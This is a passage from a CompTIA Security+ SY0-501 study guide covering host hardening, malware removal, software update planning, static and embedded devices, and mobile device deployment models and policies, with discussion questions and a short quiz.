• Enable account security features for remaining accounts.
 Use access control features to control file access.
• Verify that file permissions are correctly set for system folders, as well as those holding sensitive data.
• Use only secured network shares where necessary.
• Disable AutoPlay or other features that automatically run executable files on removable media.
 Disable unnecessary services. Ideally, you should go through the entire list of running programs,
Windows services, Linux daemons, or whatever software is operating on the system, and ensure that all
of it is necessary for normal use.
• In particular, disable network services that aren't normally needed.
• Commercial systems often include third-party software which should be uninstalled.
 On larger networks use directory services for central account management and system monitoring, such
as Windows domains with Active Directory.
 Ensure that operating systems are kept up to date. Either configure individual hosts to automatically
install security updates regularly, or use centralized patch management software to keep all systems
updated at once.

CompTIA Security+ Exam SY0-501 311


Chapter 6: Securing hosts and data / Module B: Securing hosts

Securing peripherals
When you secure computers, remember that peripherals attached to them can be subject to or involved in
attacks.

Exam Objective: CompTIA SY0-501 2.4.6, 3.3.3, 3.9.18

 To control what peripherals can be attached to a workstation, disable access to external ports or use
computer and user policies to restrict use of unauthorized peripherals.
 External storage devices are both a high risk of malware, and an easy data exfiltration tool. In highly
secured areas you might want to forbid them entirely. In lower security areas, restrict them with
computer and user policies.
 Some SD cards have a built-in Wi-Fi adapter. This means that not only do they have the risks of any
external storage device, they have the risks of a wireless adapter.
 Digital cameras are a double threat. Not only can they be used to photograph sensitive documents and
other visual data, but they double as external storage devices. Wireless models can even be used to
access networks.
 Wireless devices such as keyboards and mice are not only subject to electromagnetic interference, but if
they use insecure protocols it's possible for attackers to spy on input or remotely access the computer.
• Bluetooth devices use encrypted connections for built-in security, but you still need to be aware of
what devices are paired with any Bluetooth-enabled computer. You also need to be aware of Bluetooth
attacks.
• Non-Bluetooth wireless devices tend to use a variety of proprietary protocols. Most have weak or no
encryption so are easy for an attacker to eavesdrop on or manipulate.
 Shoulder-surfing is a risk when using any display where someone can see it.
• Be careful when viewing sensitive information in public on a laptop or mobile device.
• Where relevant, position workstation displays so visitors not authorized to see displayed content
cannot see the screen. This is especially important at medical reception desks or other places
employees need to view sensitive information around unauthorized people.
• Privacy filters or screen filters are screen coverings that reduce display viewing angles, so that the user
can still see normally but other people leaning in cannot.

Securing applications
The most important software to harden is the web applications used on critical servers, but even on an
ordinary workstation installed software can easily compromise security. Not only do you need to ensure that
all installed applications are securely configured, you need to decide what applications users can run. There
are two primary approaches, which you can apply either by user policies or technical controls.

Exam Objective: CompTIA SY0-501 2.3.10, 2.3.12, 2.4.5, 3.3.2.7

Blacklisting Uses a list of software which is not allowed for use, such as malware or other known problem
applications. Applications not on the blacklist are presumed safe to run. Antivirus scanners are
an example of blacklisting software: the scanner maintains a list of known malware and blocks
it from running if detected.
Whitelisting Uses a list of approved software which users can run. If software is not whitelisted, it is
presumed to be forbidden. Many mobile devices employ whitelisting by only allowing
applications to run if they're digitally signed by a trusted application store. You can also
employ simple whitelisting by only letting users install applications by administrator approval,
but there are third-party solutions to give more detailed control.

312 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module B: Securing hosts

Whether your fundamental application controls are blacklisting or whitelisting, and enforced by policies or
technology, you need to make sure they're carefully configured to avoid introducing security vulnerabilities.

 Ensure that installed applications are installed in compliance with their license agreements. Failure to do
so could cause application failure, update failure, or just legal liability.
 When choosing between competing applications, review each option for known security weaknesses.
 Configure AAA features for any application which uses them in accordance with a unified security
policy, especially any providing network services.
 Disable network components for applications which do not need them.
 Web browsers and their add-ons are particularly susceptible to attack.
• Install browser updates whenever they are released.
• Configure security and privacy settings to be as strict as possible without interfering with normal use.
• Restrict add-ons and plugins that might compromise security, and keep them up to date. In particular,
the Flash and Java plugins are nearly as popular with malware creators as they ever were with website
and game designers.
 Apply heightened security to other network applications and their configuration settings.
• Instant messaging and file sharing applications are commonly used as attack vectors.
• Some applications have been known to include network servers or vulnerabilities that aren't apparent at
a quick glance.
• Avoid insecure protocols such as Telnet, TFTP, SLIP, and SNMPv1 and v2. FTP and HTTP are harder
to avoid, but still use unencrypted data and clear text credentials: use the SSL equivalents for both
when possible.
• Configure security and encryption options for secure protocols like SNMPv3, SSL, SSH, and so on.

Security software
Depending on the operating system, a newly-configured system might have quite a bit of software designed to
secure it against attacks, or you might need to install some yourself. Even if it does, you'll still need to ensure
that it's configured and updated properly. There are several types of software you should install in general, and
regulatory compliance for your particular organization might mandate more specific settings.

Exam Objective: CompTIA SY0-501 2.4.2, 2.4.7

Antivirus Every host should have an antivirus application with real-time monitoring enabled at all times
and kept up to date. In addition, it should be configured for weekly or even daily system scans
after hours. Windows 8 and later includes a version of Windows Defender with antivirus
capability, but many other free and commercial applications are available.
Firewall Every host should have a host-based firewall deployed, whether or not it is also protected by a
network firewall. Usually this will be a software application. At the minimum, the firewall
should be configured to block all ports not being used by important network applications.
Most operating systems include a firewall, but third party alternatives are available.
Anti-spyware Some antimalware software specializes on spyware or other threats rather than providing real-
time antivirus protection. For example, the version of Windows Defender found in Windows
7 and earlier was an anti-spyware application. These applications might find other threats that
traditional antivirus does not, but must be configured for scheduled scans instead of full-time
monitoring.

CompTIA Security+ Exam SY0-501 313


Chapter 6: Securing hosts and data / Module B: Securing hosts

Pop-up Browsers are a major vector of malware, and also need to be hardened. One of the most
blocker effective tools is a pop-up blocker feature or add-on, which prevents pop-up windows which
may carry malware-laden adds or scripts, or simply annoy users.
Anti-spam Excessive spam can be annoying even outside of malware risks. If server side spam filters
aren't enough to control the problem, host-based anti-spam applications or even email client
filtering features can help. Typically antivirus programs also scan incoming mail for malware.
HIDS Host-based intrusion detection systems scan for changes in a system's security status, and
may also monitor against network intrusions. While this sounds similar to antivirus and
firewall software, HIDS is generally designed for protecting servers that host important
services or data. Examples include Tripwire, OSSEC, and Samhain.
File integrity Software that checks critical operating system or application files against a known baseline to
monitor detect any changes, typically by means of a cryptographic hash. File integrity checking can
also be used for archives, data transmitted over the network, or even configuration settings
that aren't intended to be changed frequently.

In a small organization you might configure individual workstations with the security software they need, but
in a larger enterprise environment it's easiest to deploy centrally managed security suites. Popular examples
include Symantec Endpoint Protection, Kapersky Total Security, and McAffee ePolicy Orchestrator. These
may also offer other features such as device encryption and backup.

Note: Keep security software up to date. Antimalware software in particular may have one or more
definition updates per day, and keeping them applied is critical for stopping new and rapidly spreading
threats.

Physically securing hosts


The most direct attack on any host is someone physically walking off with it, either to steal valuable hardware
or just to be able to crack it open at leisure for its sensitive data. Even without literally stealing the system,
privacy and physical access can allow an on-site attacker the ability to bypass authentication systems or
network controls. This should be less of a risk in areas with strong physical security, but when hosts are in
risky places, or are particularly high value targets, you should consider additional security.

 Cable locks are an effective against casual theft, even if they're less useful against determined attackers.
• Laptops and some other devices frequently have a standard Kensington security slot that a compatible
lock can plug into.
• You can also connect a cable to loops or adhesive security plates on desktop hardware.
• Ensure that the other end of the cable is securely affixed, or else a thief will have no trouble securing
the system anyway.
 Lockable desktop cases can prevent intruders from accessing hard drives or other internal hardware.
 Lockable cabinets can provide more complete security for hosts or other hardware.
• Active systems should only be stored in cabinets with adequate ventilation. Lockable server cabinets
typically are designed for this purpose, but desks with lockable cabinets can be a recipe for overheating
problems even if they technically are supposed to hold a desktop.
• Cabinets, especially metal ones, can attenuate Wi-Fi signals. This can hurt network connectivity and
performance for WAPs or wireless adapters.
• Secure cabinets, or even safes, are ideal for portable and high-value equipment such as stored laptops,
backups, and external media.
 Don't forget the obvious social engineering approach. Someone walking down the hall with a desktop is
probably just an IT worker on an errand, but that assumption can also enable a daylight theft.

314 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module B: Securing hosts

Discussion: Host security


1. Examine your current workstation. Does it have account control and file permissions set securely?
Answers may vary.
2. Is the operating system up to date?
Answers may vary. You can check for updates.
3. Are your network applications up to date?
Answers may vary.
4. What security software is installed?
At the least there should be antimalware and firewall software.
5. Is your workstation physically secure?
Answers may vary.
6. Does your organization have a formal security baseline for employee workstations?
Answers may vary.

Removing malware
The process for repairing an infected system is pretty straightforward, but even if you follow it precisely that
doesn't make it easy. Wiping away some malware is a simple process, but others can dig very deeply into the
operating system and take elaborate or creative methods to remove.

1. Identify symptoms that suggest the presence and nature of installed malware.
2. Quarantine the infected system.
3. In Windows, disable System Restore.
4. Repair the infected system.
a) Update antimalware software.
b) Use scanning and removal tools.
5. Update the system and schedule future scans.
6. Enable System Restore and create a new restore point.
7. Educate the end user and document findings.

CompTIA Security+ Exam SY0-501 315


Chapter 6: Securing hosts and data / Module B: Securing hosts

Quarantining systems
Once you've determined that a system likely has malware, you need to immediately quarantine it until the
situation is resolved. If you don't, the malware could easily spread through the network or storage devices.

 Isolate any removable storage devices that have been recently connected to the computer, or backups
that might have been made since infection. They'll need to be scanned, and shouldn't come into contact
with other systems.
 Disable all network shares, file sharing applications, or other ongoing connections to other computers.
 Identify and isolate other computers that might be infected. Any systems that regularly share files or
synchronize data with the infected system are at risk. Contact other technicians or network
administrators to see if similar symptoms have appeared elsewhere.
 Limit network connectivity. Disconnecting from the network entirely is the surest way, but if you need to
download tools or definition updates from the infected computer, just do your best to isolate it from
other computers on the local network.

Remediating infected systems


Actually removing malware is its own troubleshooting process. You'll have to choose tools, verify findings,
and apply creative solutions as necessary. there are some general steps and techniques you'll have to keep in
mind.

 Always use updated tools. Effective security software is updated frequently, even with daily definitions.
Outdated software an be useless against a new threat.
 Combine multiple tools, especially when the system might have multiple separate infections. Specialized
antispyware scanners can find what common antivirus monitors do not, and even two different brands of
the same type of scanner might find very different results. Run one tool, then the other: trying to scan the
system with two at once can hurt the performance of both.
 Run multiple scans to verify malware removal. In particular, if you think the system is clean, reboot and
then scan it again.
 If the system won't boot normally, or if particularly well-protected malware can't be completely
removed, try safe mode, restore environments, bootable rescue discs, or removal tools targeted to the
specific infection.
 Don't forget to scan removable media that may have been infected.
 After the malware is removed, you may need to reconfigure or reinstall services and applications
affected by it, or restore data from a clean backup.

316 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module B: Securing hosts

Securing repaired systems


Odds are that a newly repaired system is going to encounter malware again, and if it got infected last time it's
likely it's still vulnerable. Immediately after the repair process, you need to harden the system again and make
sure it's more secure than it was when it was infected.

 Update all potentially vulnerable software: not only the operating system and antimalware applications,
but network applications such as browsers along with their add-ons and plugins.
 Schedule regular security scans and definition/OS updates. Even if a program doesn't include scheduled
scans, you can run it through Task Scheduler.
 Prevent worms by disabling unnecessary services and tightening firewall protections.
 Examine system and application settings to look for other security problems.
 If you can find out how the system was infected, take more specific measures to prevent recurrence. For
example, if users are installing trojan horse programs, you might consider restricting user permissions or
revising user policies to prohibit unauthorized software.

Following up on repairs
Your work isn't done once the system is working. Especially if user error led to the infection or delayed its
discovery, you need to notify the user. You also need to document your findings, and present them to system
administrators or management.

 Discuss your findings with any users that might be involved with the infection.
• Try to learn more about when and how the problem began, and what actions the user took.
• Instruct the user about your organization's security policies, as well as best practices to avoid future
infection from the same or similar threats.
• Describe what signs there might be if the threat wasn't completely removed, and ask the user to contact
you if there's any recurrence.
 Document your findings and the steps you took to resolve any problems.
 Report your findings to network administrators and other appropriate management.
• Include any potential risks elsewhere on the network.
• Notify them of any provable or suspected human attacks or policy violations.
• Point out specific policy changes or technical controls which could reduce chances of the event
recurring.

CompTIA Security+ Exam SY0-501 317


Chapter 6: Securing hosts and data / Module B: Securing hosts

Software changes
It's easy to see software changes as more inconsequential than hardware changes, especially when you wake
up every morning to a notification of which apps on your phone got updated overnight. That's a dangerous
assumption on a secure network. Even leaving out major changes, such as operating system or major software
upgrades, even fairly minor updates can cause problems sometimes. The risk is higher on networks using
custom or legacy software that might rely on old or undocumented features prone to changing unexpectedly.
Larger networks have the added challenge of needing to roll the same changes out across a wide variety of
systems at the same time in order to preserve compatibility. On a tightly managed network, all software
updates should be part of a patch management process, even if not all need the same level of scrutiny. Making
it even more complicated, protecting against new threats means that security updates need to be installed
quickly across all hosts.

Exam Objective: CompTIA SY0-501 3.3.2.2


There is no shortage of software components that need updating, too. Even on the smallest network you want
to check for updates regularly on host operating systems, device drivers, motherboard or router firmware, and
application software. On a large network, you might have a central solution for updating like systems, but as
much as that decreases work, it also carries risks of its own. It doesn't help that "update" can mean almost
anything, and the other terms used are often casually interchanged or at the least are used differently by
different manufacturers.

Major vs. minor Terms used by some manufacturers to distinguish between large changes to software
updates and minor bugfixes. The two might be distinguished by name or by version
numbering scheme.
Patch A public update intended to correct a single bug, vulnerability, or other issue.
Generally a patch won't add or improve any features, just fix shortcomings. It's
possible that vulnerability patches might simply shut down a vulnerable service until
it can be fixed in a later release.
Hotfix An update for a very specific issue, which may or may not be public or recommended
for most users. Sometimes a hotfix represents something so urgent that it can't wait
for a normal update release process, or even just something that can be applied to a
running system or service with no downtime.
Service pack A large compilation of all patches and other updates to an operating system or
application, designed to be installed all at once. Service packs sometimes include new
features, though generally only if they're intended to solve major shortcomings in the
original software. For example, Windows XP Service Pack 2 introduced a firewall
application because it had become apparent, since XP's initial release, that every
computer on the Internet needed one. Commonly a service pack is seen as a new
compatibility baseline for other software.
Upgrade A new software version, which may include entirely new features and operation. For
commercial software, upgrades may be new, paid products, but they might also be
free. Either way, upgrades give the fewest guarantees of continued compatibility with
existing systems.
Maintenance release A compilation of patches and hotfixes intended to fix multiple issues. Maintenance
releases bridge the gap between service packs or software versions and are generally
smaller than either.
Definition update Updates to a software database, typically the definition lists used by antivirus or other
security software.

318 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module B: Securing hosts

Unofficial patch A patch, maintenance release, or service pack created by a third party, such as a
software community instead of by the software manufacturer. Frequently found with
older or discontinued software or in other cases where the original manufacturer is
unable or unwilling to address issues.
Rolling release Software that doesn't use discrete versions, but instead a constantly updating
development cycle that keeps the software up to date but complicates keeping
specific versions for compatibility. Used in many Linux releases, though similar
principles apply to many other constantly updating applications.

Planning software updates


In general, planning software updates should fit right into your general change management process. Like any
other category of change, it has particular concerns you need to address, and questions you need to answer.

Exam Objective: CompTIA SY0-501 2.4.8

1. Evaluate whether the update is actually necessary. Just because it's released doesn't mean you need it, and
any change to the network introduces risk.
• Security- or stability-related updates should generally be installed unless you have a reason not to.
• Compatibility patches usually are only important if they apply to your particular situation. For
example, a motherboard firmware update that adds new processor support should be ignored unless
you plan to install one of those processors.
• Performance fixes or feature enhancements should be individually considered according to your needs
and their potential impact.
• Major updates need more examination than minor ones.
• Sometimes you may need to downgrade to an older software revision when a problem is recognized.
2. Consider the impact of the update, and perform research on potential problems.
• Device firmware updates have a high level of risk, since a problem can render the system inoperable.
• Operating system and device driver updates can also cause serious problems, but the worst case is
usually recovery from backup.
• User application updates can include changes to document or database formats, possibly impairing
interoperability with users of older versions of the same software.
• Matching client and server applications may need to be updated at the same time.
• Software updates may introduce dependencies; in order to update one application, you might first need
to install or update another.
• Updates of any type of software may change or reset configuration settings.
3. Plan the update process.
• Ensure that you have all necessary access permissions.
• Make necessary backups of systems, data, or configuration settings. You might not be able to back up
configuration settings directly; in that case, document them, so they can be manually reset if necessary.
• Downgrades are generally less supported than upgrades and sometimes might require more complex
procedures or even a full re-installation.
• Some updates can be introduced gradually on the network, while others must be completed all at once.
• Use patch management software to deploy or track updates across entire systems or networks.
4. Enact and finalize the update like any other network change.

CompTIA Security+ Exam SY0-501 319


Chapter 6: Securing hosts and data / Module B: Securing hosts

Discussion: Software updates


1. Have you ever had a software update not go as planned? If so, what happened?
Answers may vary.
2. What could have prevented the problem?
Answers may vary.
3. Does your organization have a formal process for host software updates?
Answers may vary.

Static environments
When you think of hosts to be secured you'll understandably first consider the workstations and servers on the
network, running Windows, OS X, Linux, or what have you. All general purpose computers with a wide
variety of software that you can easily configure (or misconfigure) however you like. That's not bad, since
those systems do a lot of work and present a large part of your network's security risks; it's just not also a
complete perspective.

Exam Objective: CompTIA SY0-501 1.6.2, 3.3.2.1.4, 3.3.2.1.5, 3.5


Your workplace is probably full of static devices: specialized or limited computers with tightly integrated
software and operating systems, not as easily configured and updated as a typical desktop host but still
functioning as computers and even network hosts. Most use a system on a chip (SoC) architecture, and a
minimalist operating system. The latter might be a simple custom program, a real time operating system
(RTOS) designed for instant response in time-critical devices, or just a stripped-down version of Linux or
some other operating system designed first for general-purpose computers.
You might not even think of many static devices as computers, so much as appliances needing little
maintenance and posing little security risk. While it's true that many of them have limited capability and a
small attack surface, they still often have vulnerabilities and have even been targeted by major attacks. Static
devices aren't a unified whole, but rather a variety of hardware and software architectures that serve a variety
of purposes.

Embedded devices Embedded devices with custom software running on flash firmware are everywhere.
Many are internally fairly capable computers, and can have significant security risks.
Network appliances like switches, routers, and WAPs are the most obvious targets.
So are network-attached security devices such as alarms or IP camera systems.
Others include network printers and multifunction devices (MFDs), smart TVs and
game consoles, HVAC control systems, and any Bluetooth-enabled device.
Kiosks Interactive kiosks and related internet kiosks are a special case. Some are embedded
devices running specialized operating systems, but many use fully capable
workstation operating systems that just run kiosk software as a user shell. In the
latter case especially, the kiosk needs all the security a real public workstation would,
plus configuration to make sure that unauthorized users in no way can bypass the
kiosk software or install and run unauthorized programs.
Smart devices One class of embedded device that's gotten a lot of attention recently is the Internet
of Things (IoT), a general term for computerized versions of ordinary devices and
appliances which can connect to each other or to general-purpose computers. They
include home appliances, lighting or HVAC controls, and wearable appliances such
as smart watches and medical sensors. Unfortunately, they're often designed with
security as an afterthought.

320 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module B: Securing hosts

SCADA/ICS Supervisory control and data acquisition or industrial control system standards are
widely used for networked industrial equipment. Traditionally they used different
architectures and networks from general purpose computers, but converging systems
have left them open to attack. The Stuxnet virus was the first high profile attack
against industrial systems.
Mainframe Mainframes, at least those with significantly different software environments than
ordinary servers, are often overlooked when it comes to security. While they may be
subject to fewer attacks, they're still full-scale computing environments that can be
compromised.
Mobile devices Android or iOS devices are fully-featured computers which need to be secured.
Fortunately they tend to need less configuration than desktops and laptops, but you
might not have full control of mobile devices on your network, or be able to secure
work-related data completely on a user-owned device Additionally, older devices
may no longer receive updates and pose security vulnerabilities.
In-vehicle computing Modern vehicles are equipped with ever increasing computing systems, used for
systems GPS navigation, engine controls, and more. White hat hackers have already
demonstrated the ability to take remote control of vehicles using onboard Wi-Fi, and
the actual risk of attack is present but not fully understood. Aircraft are even more
heavily computerized than ground vehicles, and in theory any unmanned aerial
vehicle (UAV) can be completely taken over by an attacker.
Legacy systems While older computers running end-of-life(EOL) software aren't technically static
devices, they share some of the same problems: once vendors stop supporting them
you can't update them to meet new threats. If you have some critical old application
that will only run on some ancient operating system, you can't harden it the same
way as you would a modern host, and it might not even run modern security
software. At the same time, the attacks that targeted it haven't gone away.

CompTIA Security+ Exam SY0-501 321


Chapter 6: Securing hosts and data / Module B: Securing hosts

Alternative threat mitigation


Sometimes static devices aren't a major security risk and you don't need to take special measures to protect
them. When they are, especially if there's a known threat, you need to do your best to harden them by
alternative means. Since you don't have the same freedom to configure and harden them that you do ordinary
hosts, you'll need to use manual methods or the surrounding network and environment.

Note: All of these techniques are equally applicable for conventional networks that need high security.
It's just that when a static device has a security problem your options for mitigating it directly are
limited.

Security layers Apply defense in depth, securing vulnerable systems in layers. That way, a failure
in one control is less likely to be crippling.
Control redundancy and Redundant controls, such as firewalls, can add security: if one fails, the other is
diversity still there. It's most effective when the redundant controls are also diverse, as in
different in nature or from different vendors. Two firewalls from two different
vendors are likely to have different weaknesses, so that an attacker able to breach
one might not be able to affect the other.
Network segmentation Using subnets or VLANs, place vulnerable devices on different network segments
where they're less susceptible to attack or less able to infect other hosts if
compromised. For instance, SCADA systems should be segmented from ordinary
data networks, and guest Wi-Fi should be isolated from the corporate network.
Application firewalls Application layer firewalls can give more intelligent protection against network
threats than traditional firewalls.
Wrappers Legacy systems or other vulnerable devices can be encased in a hardware,
software, or network wrapper that intercepts all communications meant to the
device and handles security for it. Functionally, it's like adding a complete
firewall/antivirus/IDS solution to a system that can't otherwise run them.
Firmware version control Many firmware-based devices receive regular security updates just like any other
operating system. They seldom update automatically, so you might need to
manually apply updates as they're released. Sometimes third-party firmware is
available for outdated devices, but make sure it's both secure and compatible
before applying it.

Discussion: Managing static environments


1. What static devices or unconventional hosts are on your network?
Answers may vary.
2. What measures are in place to protect them from attack?
Answers may vary.
3. How could you take extra steps to protect devices at risk?
Answers may vary, but most involve updates and network-level protections.

322 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module B: Securing hosts

Assessment: Securing hosts


1. What was the first version of Windows to include real-time antivirus scanning? Choose the best response.
 Windows XP Service Pack 2
 Windows Vista
 Windows 7
 Windows 8
 Windows 8.1

2. In general, you should leave the Guest account in Windows disabled. True or false?
 True
 False

3. A company configures workstations only to run software on an approved list. What is this an example of?
Choose the best response.
 Blacklisting
 Hardening
 Sandboxing
 Whitelisting

4. A service pack is generally a more major update than a maintenance release. True or false?
 True
 False

5. Downgrades are often more difficult than upgrades. True or false?


 True
 False

6. What security feature makes it more difficult for an attacker to trick you into installing a fraudulent
Ethernet driver that reports on your network activities? Choose the best response.
 Code signing
 Firewall
 HIDS
 Trusted hardware

7. What potential security risk does an SD card pose that a USB thumb drive does not? Choose the best
response.
 Data exfiltration
 Malware
 Photographs of sensitive areas
 Wireless attacks

CompTIA Security+ Exam SY0-501 323


Chapter 6: Securing hosts and data / Module C: Mobile device security

Module C: Mobile device security


Even if modern mobile devices are full-featured computers in their own right and face the same kinds of
threats as workstations, the actual risk posed by a given threat might be very different. For example, while
smartphones and tablets tend to run few services vulnerable to network attacks, they're far more likely to be
stolen than a desktop. This is one reason it's even more important to use backup functions or cloud storage on
a device storing important data. It's also why mobile devices have many operating system functions, hardware
features, and software applications designed to make devices and their contents useless to a thief or nosy
discoverer.
You will learn:
 How to plan mobile device policies
 About mobile authentication features
 About mobile data protection
 About security concerns with mobile applications

Mobile device risks


On the surface, mobile devices seem more secure than desktops or laptops. Mobile operating systems are
relatively hardened out of the box, application permissions are centrally managed, and applications
themselves run in sandboxes with limited ability to affect the operating system or other applications. In fact,
on most devices it's prohibited or difficult to run apps that didn't come from a trusted app store, or sometimes
to connect the device to another carrier's network. Even the hardware being more tightly integrated means it's
harder to make unauthorized changes. Operating system vulnerabilities on newer devices are usually patched
quickly, due to automatic over the air (OTA) firmware updates.

Exam Objective: CompTIA SY0-501 2.5.3, 3.3.2.1.6


Like any security, these restrictions aren't absolute or unbreakable. It's possible for a user to root or jailbreak a
device to gain full administrative control: while this is useful, it can compromise security, especially when an
employee performs an unauthorized jailbreaking of a company-owned device. Even more serious is a
malicious or careless user installing custom firmware that may already be compromised.
Malware can still get on a mobile device through operating system exploits, with or without a jailbroken
device. Trojans are possible too: third-party app stores might have fewer security checks, and it's even
possible to sideload an app over USB, Wi-Fi, or just from a memory card. Suspicious software has even made
its way onto trusted app stores now and then.
When in the hands of a malicious user, or even "just" compromised by malware, a mobile device is a perfect
data exfiltration tool. Their built-in cameras and microphones can gather sensitive information, and location
systems can use geotagging to mark or send location data along with other information. Many mobile devices
have removable microSD cards in addition to their internal storage, and any device that supports USB OTG is
just one adapter cable away from connecting to any USB storage device.
The wireless networking capabilities of a mobile device let it steal data without even leaving the facility, no
matter how secure your LAN is. A device can send information out via cellular networks without even
connecting to local computers. or it can tether local computers to its cellular connection via a USB connection
or Wi-Fi. They can also use Wi-Fi Direct or ad hoc networking to connect directly to other Wi-Fi devices.
Finally, mobile devices are often used with mobile payment technologies that let you make purchases using
the device instead of a physical payment card. While these technologies have security features, they still leave
it technically possible for a compromised phone to wipe out its owner's bank account too.

324 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module C: Mobile device security

As serious as all these risks are, they're all things you can deal with. In a high security environment outside
mobile devices should be searched for and monitored like any other portable storage or recording device, and
mobile hotspots are just another form of rogue AP. Mobile devices which are actually joined to your network
can be secured like other hosts and outfitted with monitoring software to prevent misuse, albeit with some
mobile-specific technologies and policies.

Mobile deployment models


To maintain a secure IT organization, it's important to apply a consistent security policy to all devices on the
premises, on the network, or otherwise coming into contact with sensitive information. In the old days this
was easy: employee workstations and the occasional laptop were all owned by the company and could be
controlled as strictly as desired. The popularity of mobile devices doesn't make this strictly impossible—
secure facilities might ban private devices from the premises or at least from accessing company resources—
but it's no longer the normal assumption.

Exam Objective: CompTIA SY0-501 2.5.4


Before you can create mobile device policies, you need to decide on a deployment policy that determines what
kind of mobile devices employees can use for work purposes, or bring onto the premises or network. There
are four primary approaches.

COBO Corporate Owned, Business Only devices are purchased by the organization and only used for
business purposes. This gives the organization total control over what devices are used and how
they are configured. This can be unpopular with employees since they may need to juggle two
devices or be forbidden from having a personal device on the job, but it's the most secure option.
BYOD Bring Your Own Device is the other extreme: employees can use their own personal devices for
work purposes or within the company network. For small organizations with simple security
policies this is the easiest model, and it's popular with employees. The drawbacks are that
maintaining a strict mobile security policy is much more difficult both because of the wide range
of possible devices and because users will resent having limited control over their own property.
COPE Corporate Owned, Personally Enabled is a more relaxed version of COBO: devices are company-
issued and supported, but employees can use them for personal reasons too. Exactly what apps
they can install and use, or other acceptable use policies, are still up to the employer.
CYOD Choose your own device is a stricter version of BYOD: employees can choose between a list of
devices the company has approved for security features and support. Employees might be expected
to pay for their own device, or the company might subsidize its purchase. CYOD is still harder to
secure and support than corporate-owned devices, but easier than BYOD.
VDI Virtual Desktop Infrastructure clients are available for mobile devices. Some are even virtual
mobile infrastructure tools designed for mobile devices in the first place. Either one allows
employees to use personal devices to remotely access a virtual environment that's under company
control. This doesn't solve all security problems with BYOD policies, but it does help with others.

Some organizations might use a mix of these deployment models, depending on factors like job role.
Allowing devices which are used both for work and personal tasks poses several challenges both for keeping
the organization secure and to avoid conflict between employees and management.

CompTIA Security+ Exam SY0-501 325


Chapter 6: Securing hosts and data / Module C: Mobile device security

Mobile device policies


Regardless of what deployment model is in place, every organization should have security policies for mobile
devices.

Permitted devices Required features, operating systems, or models for a device to be allowed under
the policy. Broader device support is more attractive to users, but more difficult to
support and secure.
Security baselines User devices still must be configured to standard security baselines. A BYOD
baseline might be more lenient than a company device baseline when it comes to
user applications, but it should be similar when it comes to patch management,
antivirus, account security, and data protection.
Support ownership Who supports what aspects of device functions. IT may not have the time or
training to support everything that can go wrong on a wide range of user devices,
but users may lack the technical skills and security awareness to keep their own
devices configured to baseline standards.
App and data ownership Policies should clearly specify what apps and data are company property, for
example work email messages and corporate documents. Access to
communications such as SMS/MMS texts should also be spelled out.
IP theft protection User owned devices are an excellent way for a malicious employee to steal
sensitive data or commit industrial espionage. Some secure facilities prohibit all
mobile devices in certain sensitive areas. Others might simply require employees
to agree to random search of any devices they bring onto company property.
Company-owned devices can also have DLP software installed.
Other legal concerns Especially relevant if user-owned devices might be used for data or duties covered
by special laws or regulatory requirements, but important for any BYOD policy.
Policies should spell out liability in case of device misuse, and how adherence to
legal standards, NDAs, and other contracts can be verified. They should also have
clear guidelines for company access to forensic data in the event of a security
incident.
Privacy Employees should expect some privacy with personal activities and data on their
own devices, but at the same time it might be limited during work hours or on
company networks. The policy should spell out employee privacy expectations.
Network access Some workplaces may choose to limit personal devices to limited access or guest
networks. This can limit their usefulness, but makes it easier to secure them.
Acceptable use policy Just because user-owned devices are allowed to be used on work networks or
during business hours doesn't mean they can be used for everything. If user
devices are kept to a different AUP than company devices, it needs to be made
clear to users; if they are kept to the same AUP, that point needs to be reinforced.
The same is true of any other corporate policies for computer use.
Onboarding and There should be a set process for how an employee needs to prepare a device to
offboarding join the program, and another for what happens when an employee leaves or just
stops using a particular device for work. Offboarding should also address what
happens with devices subsidized by the company.
User acceptance Once the policy is in place, you'll need to test user adherence to it, look for
problems, and remediate any issues with training or compliance.

326 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module C: Mobile device security

Profile security requirements


Regardless of who owns the mobile devices employees are using, you need to ensure that they all are
consistently secured. Useful policies to standardize include:

Exam Objective: CompTIA SY0-501 2.5.2.2

 Passcode requirements
 Device encryption and other security settings
 Backup policies
 Update policies
 Required or forbidden apps
 Physical security procedures
 Acceptable use

Especially in a large organization, it's easiest if you can centrally administer devices in order to assign device
permissions, verify security compliance, apply updates, or even monitor activity. Software designed for these
tasks is called Mobile Device Management (MDM) and encompasses a wide variety of features. Some MDM
solutions are primarily designed to configure multiple devices remotely, while others primarily manage
permissions granted to different devices on the corporate network. They may include
Enterprise MDM software typically operates using security profiles, typically text-based files encoded in
XML format. A given profile might apply to a specific category of user, or role of device; it can include
security settings, apps, network access permissions, and anything else needed to configure the device to the
profile's needs. A given device might have multiple profiles applied—sometimes this means having to resolve
conflicts between them. As you might imagine, BYOD devices are likely to have different profiles assigned
than corporate-owned ones.
Along with mobile device management is mobile content management (MCM) software, which delivers
centrally hosted data or services to mobile devices. MCM can include data encryption, secure connections to
web applications, and DLP software functions.
Mobile security policies aren't strictly for smartphones and tablets: many of the same principles you need to
consider apply to laptops, and tablets running Windows or other desktop operating systems. You should also
consider security principles for removable media devices such as USB drives and SD cards, whether they're
intended to be used with desktops, laptops, or smartphones and tablets. Disabling or restricting removable
media helps keep sensitive data from easily being lost or stolen, and reduces vectors for incoming malware.

Mobile authentication
There are a lot of dilemmas involved when designing a mobile operating system, even once you're used to a
workstation OS, and a number of them are related to security. One of the big ones is that it's far easier to set a
phone or tablet where strangers can try to get access, or just walk off with it to guess passwords at their
leisure. At the same time, while you might log on to your workstation for hours at a time, you probably often
use your phone for just a moment while hurrying through your day, so making it difficult to access
undermines a lot of its advantages. On top of that, while most mobile devices are only regularly used by a
single person so aren't configured with multiple user accounts, now and then you might want to let someone
borrow yours for a bit even if you don't trust them to go sifting through everything you have on it.

Exam Objective: CompTIA SY0-501 2.5.2.4, 2.5.2.10


Mobile operating systems, and to some extent laptops running workstation operating systems, use a
combination of operating system features and third party apps to address these problems. First, mobile
operating systems by default quickly activate a screen lock on idle devices. In principle it's just like a
